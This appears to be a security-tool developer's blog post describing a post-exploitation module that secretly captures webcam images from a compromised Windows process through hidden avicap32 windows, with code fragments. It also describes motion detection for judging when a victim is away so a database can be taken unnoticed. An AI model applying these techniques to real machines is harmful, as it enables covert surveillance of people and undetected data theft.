When you spent an amount of time diving on the heap on an exploit without any significant result, you start feeling the lack of productivity.
To avoid that feeling, i from time to time stop what i'm doing to get myself into a lame pet projects to clear my mine, in this case was tasking a picture with the webcam.
It's actual quite simple, unless you follow the CF_BITMAP path, in which case you will lost a day, until you figure out the solution is CF_DIB.
The key feature of MOSDEF is the possibility that you have to avoid touching disk or executing command, unless it's really needed, this will give a tremendous post-exploitation advantage over host based IDS. Each time i see people uploading a file and executing it, it chill my spine.
MOSDEF basically compiles a C code into process independent shellcode that gets the resolution of api functions remotely, as you might guess everything gets executed on the exploited process.
The first step to write out MOSDEF C post exploitation command, is to find out what api functions you need, in this case, to get a picture of a webcam. The first google choice was to use DirectShow, which is probably the smartest idea but translated into mosdef could be a little bit time consuming (yes, tomorrow im back to more heap). So my selection was to the capCreateCaptureWindow.
#import "remote", "avicap32.dll|capCreateCaptureWindowA" as "capCreateCaptureWindowA"
This function creates a video window (which you can obviously start hidden) and returns its handle. Based on the handle, you can send different message to either record video or take a picture.
In my case, was the second option, so i did the following:
// Create a Window and connect it to the driverYou will think this is the hard part, but what it took me more time was to grab the picture out of the clipboard, since i try the to grab it as a CF_BITMAP and didn't work out as expected.
hwnd = capCreateCaptureWindowA("CANVAS", 0x40000000, 0, 0, 640, 480, proghwnd, 0);
SendMessageA(hwnd, 1024+10 ,0,0); // wm_cap_driver_connect
SendMessageA(hwnd, 1024+50 ,1,0); // wm_cap_set_preview
SendMessageA(hwnd, 1024+52 ,30,0); // set_previewrate
// Get a Frame and copy it to the clipboard
SendMessageA(hwnd, 1084,0,0); // get_frame
SendMessageA(hwnd, 1054,0,0); // wm_cap_copy copy to clipboard
The solution was to grab it as CF_DIB which returns a memory object containg a BITMAPINFO structure and after that the actual raw image.
hbitmap = GetClipboardData( 8 ); // CF_DIB
pbih = GlobalLock( hbitmap );
pBits = pbih + 49;
hor = pbih->biWidth;
vert = pbih->biHeight;
bpp = pbih->biBitCount/8;
size = hor * vert * bpp ;
This simply gets transformed into a small python command called "saycheese"
That after its get executed, you will get a scary face like this one inside your screenshot section
Neat, a picture is worth a thousand words, at least for your boss or your clients.
But if you are one of those owl hackers (*blink*) that wait into the deep of the night for your prey to stop using the machine so you can start downloading the 3gb database, you can rest now.
I add a small script that runs our motiondetection command, that returns the motion's percentage based on two pictures taken through the webcam (the algo is quite simple, just compare pixel by pixel to find out change).
Aside of the percentage, it returns into a neat picture showing the place where motion was found. (NOTE: Any resemblance of any character to any actual person, whether living or dead, is purely coincidental, specially with that Keanu Reeves movie).
EDIT: Juano@Netifera share his knowledge on the subject. To improve accuracy of the motion detection algo, you can take a couple of pictures and create an array based on the average pixel on each position, that will give you a decent background image to compare with.